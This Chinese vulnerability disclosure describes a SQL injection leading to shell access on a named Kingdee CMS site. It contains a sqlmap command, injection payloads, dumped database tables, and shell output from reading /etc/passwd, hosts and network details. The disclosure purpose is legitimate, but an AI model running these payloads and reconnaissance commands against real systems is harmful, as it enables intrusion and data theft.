|金蝶某运维不当致服务器Getshell(影响内网+10+站点)

金蝶某运维不当致服务器Getshell(影响内网+10+站点)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： ... ### 详细说明：金蝶站点：cms.kisdee.com IP： 118.194.40.103 [<img src="https://images.seebug.org/upload/201504/27163842808c0ec04713f5937507b71875908cfd.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27163842808c0ec04713f5937507b71875908cfd.jpg) Sqlmap.exe -u "http://cms.kisdee.com/yp/product.php?prowhere=1" -v 3 --dbms=mysql 注入 ``` sqlmap identified the following injection points with a total of 23 HTTP(s) requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]# --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]# --- available databases [2]: [*] information_schema [*] KDPortal sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]# --- Database: KDPortal +--------------------------------+---------+ | Table | Entries | +--------------------------------+---------+ | phpcms_member_group_priv | 807962 | | phpcms_log | 523885 | | zm_ip | 371671 | | ys_api_access | 370740 | | ys_feedback | 336509 | | phpcms_search | 124022 | | phpcms_content | 118638 | | phpcms_content_count | 116683 | | phpcms_c_news | 110427 | | phpcms_ads_stat | 106401 | | phpcms_admin_role_priv | 101413 | | phpcms_hits | 84484 | | ys_use_log | 66395 | | phpcms_content_tag | 53760 | | phpcms_attachment | 39544 | | phpcms_special_content | 27912 | | ys_opportunity | 26706 | | zhj_315_invite | 23781 | | kdcms_faqsearch | 12453 | | moweekly_wp_comments | 12393 | | phpcms_keyword | 11451 | | ys_ips | 10332 | | kdcms_hits | 8598 | | kdcms_manual | 7990 | | kdcms_manual_data | 7990 | | phpcms_menu | 7436 | | phpcms_c_policy | 7417 | | phpcms_category | 7351 | | kdcms_category | 7020 | | zm_user_credit | 6249 | | zhj_315_poll_log | 5893 | | kdcms_log | 5851 | | kdcms_faq | 5646 | | kdcms_faq_data | 5646 | | zz_thewise_reg | 5556 | | zhj_315_user | 3531 | | kdcms_linkage | 3285 | | kdcms_search | 3130 | | phpcms_app_share | 2680 | | phpcms_content_position | 2408 | | kdcms_attachment | 2364 | | phpcms_comment | 2283 | | lsw_user_state | 2102 | | kdcms_attachment_index | 1982 | | phpcms_copyfrom | 1365 | | zhj_315_award | 1350 | | EM_USER | 1239 | | lsw_user | 1123 | | phpcms_author | 1103 | | kdcms_cache | 1097 | | phpcms_pay_exchange | 937 | | phpcms_special | 935 | | ms_info | 918 | | kdcms_admin_role_priv | 773 | | lsw_func | 660 | | ys_site | 657 | | kdcms_position_data | 620 | | ys_recycler | 617 | | EE_DIGG_LOG | 615 | | ee_order_list | 605 | | member | 585 | | EE_AWARD_LOG | 571 | | phpcms_model_field | 564 | | kdcms_model_field | 455 | | kdcms_category_priv | 449 | | phpcms_block | 427 | | fouryear_user | 399 | | ee_news_detail | 398 | | phpcms_c_app | 384 | | kdcms_menu | 334 | | moweekly_wp_term_relationships | 333 | | kdcms_comment_data_1 | 309 | | moweekly_wp_posts | 309 | | kdcms_operationcase | 300 | | kdcms_operationcase_data | 300 | | kdcms_ebook | 299 | | kdcms_ebook_data | 299 | | kdcms_news | 284 | | kdcms_news_data | 284 | | phpcms_admin_role | 271 | | kdcms_video | 245 | | kdcms_video_data | 245 | | phpcms_c_ent_case | 227 | | agiletour_bingo | 207 | | auction_log | 204 | | ys_coolsite | 204 | | kdcms_comment | 195 | | moweekly_wp_postmeta | 187 | | zz_search_log | 183 | | phpcms_app_suggest | 176 | | moweekly_wp_options | 150 | | phpcms_yp_stats | 146 | | phpcms_member | 139 | | phpcms_member_cache | 139 | | phpcms_member_info | 139 | | kdcms_case | 134 | | kdcms_case_data | 134 | | tmp_case829 | 127 | | fouryear_kill | 120 | | ys_bianma | 110 | | kis_collection | 108 | | cards | 106 | | phpcms_ads | 105 | | EE_MESSAGE | 99 | | phpcms_link | 99 | | phpcms_ads_place | 92 | | em_special | 87 | | answer | 77 | | ys_livesite | 76 | | kdcms_content_check | 73 | | kdcms_down | 61 | | kdcms_down_data | 61 | | phpcms_c_ent_patch | 60 | | phpcms_app_category | 51 | | phpcms_type | 50 | | ee_product_comment | 49 | | moweekly_wp_usermeta | 48 | | ys_class | 48 | | ys_config | 48 | | auction_product | 47 | | phpcms_pay_stat | 47 | | phpcms_position | 47 | | kdcms_clientid | 43 | | kdcms_clientid_data | 43 | | phpcms_c_product | 42 | | kdcms_ep_define | 38 | | kdcms_ep_define_data | 38 | | phpcms_cache_count | 37 | | auction_orderlist | 34 | | phpcms_urlrule | 34 | | moweekly_wp_term_taxonomy | 28 | | ys_search | 28 | | moweekly_wp_terms | 27 | | kdcms_module | 25 | | phpcms_ask_actor | 25 | | phpcms_member_detail | 24 | | phpcms_model | 24 | | phpcms_module | 24 | | question | 23 | | phpcms_process_status | 21 | | kdcms_model | 20 | | phpcms_c_kis_product | 20 | | kdcms_type | 17 | | phpcms_c_ent_product | 15 | | phpcms_role | 14 | | ys_mingzhan | 14 | | kdcms_video_charge | 12 | | kdcms_video_charge_data | 12 | | ys_coolclass | 12 | | ys_index_common_use | 12 | | ys_index_hot_dowm | 12 | | ys_index_tool | 12 | | phpcms_c_ent_solution | 11 | | phpcms_space | 11 | | phpcms_vote_option | 11 | | ee_product | 10 | | kdcms_position | 10 | | kdcms_poster | 10 | | kdcms_poster_space | 10 | | kdcms_urlrule | 9 | | kdcms_yf_product | 9 | | kdcms_yf_product_data | 9 | | phpcms_status | 9 | | moweekly_wp_links | 8 | | ys_searchclass | 8 | | kdcms_admin_role | 7 | | kdcms_member_group | 7 | | phpcms_c_alliance_case | 7 | | phpcms_c_event | 7 | | phpcms_c_zhj_customer | 7 | | phpcms_editor_data | 7 | | phpcms_member_group | 7 | | kdcms_download | 6 | | kdcms_download_data | 6 | | kdcms_workflow | 6 | | phpcms_process | 6 | | phpcms_search_type | 6 | | em_class_info | 5 | | kdcms_admin_panel | 5 | | kdcms_site | 5 | | kdcms_sso_settings | 5 | | moweekly_wp_users | 5 | | phpcms_app_industry | 5 | | phpcms_player | 5 | | em_product_class | 4 | | fouryear_product | 4 | | kdcms_template_bak | 4 | | phpcms_spider_job | 4 | | ys_liveclass | 4 | | kdcms_admin | 3 | | kdcms_member_menu | 3 | | phpcms_workflow | 3 | | ys_admin_user | 3 | | kdcms_announce | 2 | | kdcms_link | 2 | | phpcms_admin | 2 | | phpcms_area | 2 | | phpcms_datasource | 2 | | phpcms_pay_pointcard_type | 2 | | phpcms_space_api | 2 | | phpcms_spider_sites | 2 | | phpcms_times | 2 | | kdcms_application | 1 | | kdcms_application_data | 1 | | kdcms_comment_setting | 1 | | kdcms_comment_table | 1 | | kdcms_picture | 1 | | kdcms_picture_data | 1 | | kdcms_session | 1 | | kdcms_sso_admin | 1 | | kdcms_sso_applications | 1 | | kdcms_videodemo | 1 | | kdcms_videodemo_data | 1 | | kdcms_wap | 1 | | phpcms_keylink | 1 | | phpcms_mood | 1 | | phpcms_mood_data | 1 | | phpcms_session | 1 | | phpcms_vote_subject | 1 | | zm_admin_info | 1 | | zz_thewise | 1 | +--------------------------------+---------+ ``` ``` [Linux debian-604-clean 2.6.32-5-amd64 #1 SMP Sat Mar 31 04:00:05 UTC 2012 x86_64(daemon)] /usr/local/ysstore/deploy/apache_portal/cms>cd / />ls -al total 400 drwxr-xr-x 22 root root 4096 May 17 2012 . drwxr-xr-x 22 root root 4096 May 17 2012 .. drwxr-xr-x 2 root root 4096 Oct 8 2014 bin drwxr-xr-x 3 root root 4096 Apr 27 2012 boot drwxr-xr-x 13 root root 2980 Feb 4 16:25 dev drwxr-xr-x 68 root root 4096 Feb 4 16:25 etc drwxr-xr-x 2 root root 4096 May 31 2012 home lrwxrwxrwx 1 root root 30 Apr 27 2012 initrd.img -> boot/initrd.img-2.6.32-5-amd64 drwxr-xr-x 11 root root 12288 Apr 28 2012 lib drwxr-xr-x 2 root root 12288 Apr 27 2012 lib32 lrwxrwxrwx 1 root root 4 Apr 27 2012 lib64 -> /lib drwx------ 2 root root 16384 Apr 27 2012 lost+found drwxr-xr-x 4 root root 4096 Apr 27 2012 media drwxr-xr-x 2 root root 4096 Jan 13 2012 mnt drwxr-xr-x 2 root root 4096 Apr 27 2012 opt dr-xr-xr-x 151 root root 0 Feb 4 16:25 proc drwx------ 7 root root 4096 Dec 31 10:44 root drwxr-xr-x 2 root root 4096 Apr 27 2012 sbin drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux drwxr-xr-x 2 root root 4096 Apr 27 2012 srv drwxr-xr-x 13 root root 0 Feb 4 16:25 sys drwxrwxrwt 2 root root 303104 Apr 27 15:51 tmp drwxr-xr-x 13 root root 4096 May 17 2012 usr drwxr-xr-x 13 root root 4096 Apr 27 2012 var lrwxrwxrwx 1 root root 27 Apr 27 2012 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64 />ifconfig eth0 Link encap:Ethernet HWaddr 00:50:56:bf:00:35 inet addr:192.168.223.136 Bcast:192.168.223.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:febf:35/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:230310969 errors:0 dropped:0 overruns:0 frame:0 TX packets:309544330 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:62579541022 (58.2 GiB) TX bytes:308678048964 (287.4 GiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:7651048 errors:0 dropped:0 overruns:0 frame:0 TX packets:7651048 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:751215062 (716.4 MiB) TX bytes:751215062 (716.4 MiB) lo:157 Link encap:Local Loopback inet addr:192.168.223.157 Mask:255.255.255.255 UP LOOPBACK RUNNING MTU:16436 Metric:1 />arp -a ? (192.168.223.133) at 00:50:56:bf:00:3b [ether] on eth0 ? (192.168.223.129) at 00:50:56:bf:00:00 [ether] on eth0 ? (192.168.223.1) at 5c:dd:70:2b:c0:77 [ether] on eth0 ? (192.168.223.130) at 00:50:56:bf:00:2b [ether] on eth0 />cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin nagios:x:1001:1001::/home/nagios:/bin/bash />cat /etc/hosts 127.0.0.1localhost 127.0.1.1debian-604-clean.kingdee.gbldebian-604-clean 192.168.223.147 api.cmcloud.cn # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters />cat /etc/issue Debian GNU/Linux 6.0 \n \l ``` [<img src="https://images.seebug.org/upload/201504/27164000fea905ea1e5f49ac9d49bcc55ef18a35.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27164000fea905ea1e5f49ac9d49bcc55ef18a35.jpg) ### 漏洞证明： ···

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™